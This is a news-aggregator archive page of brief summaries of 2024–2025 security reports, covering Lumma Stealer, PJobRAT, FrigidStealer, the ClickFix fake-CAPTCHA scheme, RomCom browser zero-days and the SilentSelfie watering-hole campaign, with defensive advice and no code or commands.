compromised websites Archives

Tech Optimizer

May 21, 2025

Lumma Stealer: Breaking down the delivery techniques and capabilities of a prolific infostealer

Microsoft has monitored Lumma Stealer, an infostealer malware used by financially motivated threat actors. Lumma Stealer, also known as LummaC2, functions as a malware-as-a-service (MaaS) solution that extracts data from browsers and applications, including cryptocurrency wallets. The entity behind Lumma is identified as Storm-2477, which maintains the malware and its command-and-control (C2) infrastructure. Affiliates can create malware binaries and manage C2 communications through a panel provided by Storm-2477. Ransomware groups have integrated Lumma Stealer into their operations. Lumma Stealer employs various delivery techniques, including phishing emails, malvertising, drive-by downloads, Trojanized applications, and abuse of legitimate services. Specific campaigns have been identified, such as one in April 2025 that used EtherHiding and ClickFix techniques to deliver Lumma Stealer via compromised websites. Another campaign on April 7, 2025, targeted Canadian organizations with emails containing invoice lures that led to malicious downloads. The malware is developed using C++ and ASM, employing advanced obfuscation techniques to evade detection. It can extract a wide range of user data, including browser credentials, cryptocurrency wallet information, and user documents. Lumma Stealer maintains a robust C2 infrastructure with multiple hardcoded and fallback C2 servers, utilizing encryption methods to secure communications. Microsoft's Digital Crimes Unit has disrupted Lumma Stealer's infrastructure by blocking approximately 2,300 malicious domains. Recommendations to mitigate the impact of Lumma Stealer include strengthening Microsoft Defender configurations, implementing multifactor authentication, and utilizing phishing-resistant authentication methods. Microsoft Defender products can detect and block activities associated with Lumma Stealer, providing alerts and insights for incident response.

AppWizard

March 28, 2025

Hackers target Taiwan with malware delivered via fake messaging apps

Recent research from cybersecurity firm Sophos has identified the use of PJobRAT malware targeting users in Taiwan through instant messaging applications SangaalLite and CChat, which mimic legitimate platforms. These malicious apps were available for download on various WordPress sites, now taken offline. PJobRAT, an Android remote access trojan first identified in 2019, has been used to steal SMS messages, contacts, device information, documents, and media files. The recent cyber-espionage initiative lasted nearly two years, affecting a limited number of users, indicating a targeted approach by the attackers. The latest version of PJobRAT lacks the ability to steal WhatsApp messages but allows attackers greater control over infected devices. The distribution method for these apps remains unclear, but previous campaigns involved third-party app stores and phishing pages. Upon installation, the apps request extensive permissions and provide basic chat functionalities. Sophos researchers note that threat actors often refine their strategies after campaigns, suggesting ongoing risks.

AppWizard

March 28, 2025

PJobRAT Android RAT as Dating & Instant Messaging Apps Attacking Military Personnel

PJobRAT is an Android Remote Access Trojan (RAT) that re-emerged in 2023 with improved capabilities and a refined targeting strategy, previously known for attacking Indian military personnel in 2021. It is now targeting users in Taiwan through social engineering tactics, disguising itself as legitimate dating and messaging apps. The malware is distributed via compromised WordPress sites hosting fake applications like “SaangalLite” and “CChat.” The infection footprint is small, indicating highly targeted attacks rather than widespread campaigns. PJobRAT retains its core functionality of exfiltrating sensitive information, including SMS messages, contacts, and media files, while enhancing command execution capabilities. Upon installation, the malicious apps request extensive permissions to operate continuously in the background. The malware uses a dual-channel communication infrastructure, with Firebase Cloud Messaging (FCM) as the primary command channel and a secondary HTTP-based channel for data exfiltration to a command-and-control server. The campaign appears to have concluded, but the evolution of PJobRAT highlights the ongoing threat of sophisticated mobile malware targeting high-value individuals.

Tech Optimizer

March 20, 2025

What the Tech: Stolen passwords

Infostealer is a type of malware that has stolen over a billion credentials, posing significant risks such as identity theft and financial fraud. It targets users through specific search terms related to free software, cracked software, game cheats, and activation tools. Cybercriminals use tactics like search engine ads, SEO manipulation, social media promotions, and typosquatting to direct users to malicious sites. Once infected, Infostealer can steal saved passwords, credit card information, cryptocurrency wallet data, and personal information. To mitigate risks, individuals should download software from reputable sources, be cautious of too-good-to-be-true offers, install robust antivirus software, enable ad blockers, verify URLs, use multi-factor authentication, keep software updated, and educate themselves about cybersecurity threats. Additionally, checking for compromised email addresses or passwords at www.haveibeenpwned.com is recommended.

Tech Optimizer

March 9, 2025

Do Macs Really Need Antivirus? The Truth About Mac Security in 2025

Mac users have historically believed their computers are immune to viruses and malware, but this notion may be outdated as cyber threats evolve. The rise in popularity of Macs has attracted cybercriminals, leading to the development of sophisticated malware and ransomware specifically targeting Mac operating systems. Phishing attacks have also become more prevalent, using impersonation tactics to extract sensitive information from users. Built-in security features like Gatekeeper and XProtect provide some protection, but experts now recommend considering third-party antivirus solutions for enhanced security, especially when handling private information, downloading from unverified sources, or using Macs in business environments. While some users worry that antivirus programs may slow down their systems, modern options are designed to be more efficient. Ultimately, the decision to use antivirus software depends on individual digital habits and risk tolerance.

Tech Optimizer

March 3, 2025

New malware exploits fake updates to steal data

Recent developments indicate that Mac users are facing an escalating threat from malware designed for macOS systems, particularly with the emergence of a strain called FrigidStealer. This malware spreads through deceptive browser update prompts on compromised websites, leading users to download a malicious DMG file that seeks elevated privileges to steal sensitive information. Cybersecurity firm Proofpoint has traced the operations of FrigidStealer to two threat actors: TA2726, a traffic distribution service provider, and TA2727, which delivers the malware. This campaign also targets Windows and Android devices, indicating a multi-platform strategy. Additionally, the rise of infostealer malware has compromised approximately 330 million credentials in 2024, with around 3.9 billion credentials circulating from infostealer logs. Users are advised to adopt protective measures, including being cautious of fake software updates, enabling two-factor authentication, using password managers, and exercising caution with downloads and links.

Winsage

February 5, 2025

Windows 10 on the brink of extinction: This is how vulnerable you really are!

Microsoft will cease support for Windows 10 in October 2025, meaning new security vulnerabilities will not be patched, increasing exposure to threats. Cybercriminals are expected to target Windows 10, which still has over 60% market share, making it an attractive target. ESET estimates that around 32 million PCs in Germany are still using Windows 10. Users can opt for the Extended Security Updates program for an additional cost, extending updates until October 2026, or use 0Patch for updates until 2030. Windows 10 IoT Enterprise LTSC 2021 will receive updates until 2032, but its use as an office PC is restricted. Users are encouraged to upgrade to Windows 11 where hardware compatibility exists for ongoing security updates and new features.

Tech Optimizer

December 24, 2024

‘Fix It’ social-engineering scheme impersonates several brands

Malicious actors are increasingly exploiting web browsers to deliver malware, often bypassing conventional antivirus defenses through sophisticated social engineering. A notable tactic involves copying harmful commands into the clipboard, allowing victims to execute them unknowingly. Recent investigations revealed a campaign using malicious advertisements and counterfeit pages that mimic reputable software brands, leading victims to a fake Cloudflare notification that prompts them to execute specific key combinations. This process triggers PowerShell code that retrieves and installs malware. The investigation began with a suspicious advertisement for a 'notepad' application, which redirected users to a Cloudflare-like page asking them to verify they are human. Instead of a standard CAPTCHA, users encountered a prompt instructing them to follow steps that would inadvertently execute a malicious command. By clicking a 'Fix It' button, the harmful command is copied to the clipboard, and users are led to paste and run it, initiating a download from a remote domain. The campaign targeted several brands, including Microsoft Teams, FileZilla, UltraViewer, CutePDF, and Advanced IP Scanner. The same domain linked to the malicious PowerShell command for Notepad++ also appeared in another campaign. Indicators of compromise include various malicious domains and URLs associated with the malware and its command and control server. Malwarebytes provides protection against these threats.

Winsage

November 27, 2024

‘RomCom’ APT Mounts Zero-Day, Zero-Click Browser Escapes in Firefox, Tor

In October, Russian hackers gained the ability to deploy arbitrary code against users of Firefox and Tor, exploiting two zero-day vulnerabilities: CVE-2024-9680 in Mozilla software and CVE-2024-49039 in Windows. The first vulnerability, a use-after-free flaw in Firefox's animation timelines, was rated 9.8 on the CVSS and allowed attackers to execute arbitrary commands. The second vulnerability enabled privilege escalation through an undocumented remote procedure call (RPC) endpoint. Both vulnerabilities were quickly patched, with CVE-2024-9680 addressed on October 9 and CVE-2024-49039 on November 12. The majority of targets were located in North America and Europe, particularly in countries like the Czech Republic, France, Germany, Poland, Spain, Italy, and the US. None of the victims tracked by ESET were compromised via Tor.

AppWizard

September 27, 2024

SilentSelfie Exploited 25 Websites To Deploy Malicious Android Application

Researchers uncovered a cyber espionage campaign called “SilentSelfie” targeting Kurdish communities, exploiting 25 compromised websites with four variants of malicious JavaScript. The campaign, active since late 2022, utilized watering hole attacks and a covert Android application disguised as a news app to collect sensitive data, including location and contacts. The attackers employed obfuscation techniques and used compromised web servers for communication. A total of 21 Kurdish websites were affected, primarily linked to “Rojava” and Kurdish political entities. The campaign remained undetected for over 18 months, with potential links to Turkish intelligence, Syrian government agencies, and the Kurdistan Regional Government of Iraq. Compromised sites included ‘RojNews’ and ‘YPG Rojava.’